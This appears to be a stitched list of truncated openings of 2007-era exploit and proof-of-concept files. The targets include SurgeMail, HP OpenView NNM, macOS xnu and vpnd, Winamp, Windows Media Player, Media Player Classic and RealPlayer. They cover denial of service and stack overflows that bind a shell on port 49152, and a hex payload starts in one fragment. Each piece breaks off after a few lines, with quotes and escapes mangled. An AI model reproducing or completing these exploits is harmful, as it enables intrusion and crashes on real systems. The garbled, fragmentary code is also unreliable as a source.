?php /* SurgeMail v.38k4 webmail Host header denial of service exploit tested against the windows version rgod */ dl(php_curl.so); $url = http://192.168.0.1; $puf=str_repeat(0xff,0xfff); $header =POST / HTTP/1.0rn; $header.=Host: $pufrn; $header.
/* http://secunia.com/secunia_research/2007-99/advisory/ * * A remote attacker could send a specially crafted SAMLOGON domain * logon packet, possibly leading to the execution of arbitrary code with * elevated privileges. Note that this vulnerability
#!/usr/bin/python # HP OpenView Network Node Manager CGI Buffer Overflow # Tested on NNM Release B.07.50 / Windows 2000 server SP4 # http://www.zerodayinitiative.com/advisories/ZDI-07-071.html # Coded by Mati Aharoni # muts|offensive-security|com # h
/* xnu-superblob-dos.c * * Copyright (c) 2007 by mu-b@digit-labs.org * * Apple MACOS X xnu = 1228.0 local kernel DoS POC * by mu-b - Mon 10 Dec 2007 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * * assert trip or bcopy (NULL, .
#!/usr/bin/env perl use strict; use warnings; ############################################### use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my (%args, $user, $password, $sql_host, $sql_user, $sql_password, $cookie, $path, $file, $up
#!/bin/perl # # Nullsoft Winamp MP4 tags Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Tuned for Nullsoft Winamp 5.32 d.i. # Shell on port 49152 # # usage: # well, not much fun for you kids here .. # to
#!/bin/perl # # Windows media player 6.4 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/co
#!/bin/perl # # Media Player Classic 6.4.9 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/
/* sing file append exploit by bannedit 12/05/2007 The original reporter of this issue included an example session which added an account to the machine. The method for this exploit is slightly different and much more quiet. Although it relies upon l
/* vpnd-leopard-lb-dos.c * * Copyright (c) 2007 by mu-b@digit-labs.org * * Apple MACOS X 10.5.0 (leopard) vpnd remote DoS POC * by mu-b - Fri 9 Nov 2007 * * - Tested on: Apple MACOS X 10.5.0 (leopard) vpnd * * Program received signal EXC_ARITHMETIC,
/* xnu-macho-dos.c * * Copyright (c) 2007 by mu-b@digit-labs.org * * Apple MACOS X xnu = 1228.0 local kernel DoS POC * by mu-b - Thu 15 Nov 2007 * * - Tested on: Apple MACOS X 10.4 (xnu-792.22.5~1/RELEASE_I386) * Apple MACOS X 10.5.1 (xnu-1228.0.2~1/
#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie import sys import os head = (x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01+ x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E+ x61x75x0
/* * Windows Media Player AIFF Divide By Zero Exception DOS POC * by Hong Gil-Dong, Jeon Woo-chi * Jeong Ji-Sang (?1135), He was one of the most famous korean * poet. This poem says sadness about good-bye'. * * * * * * If you open the kr.aiff in Wind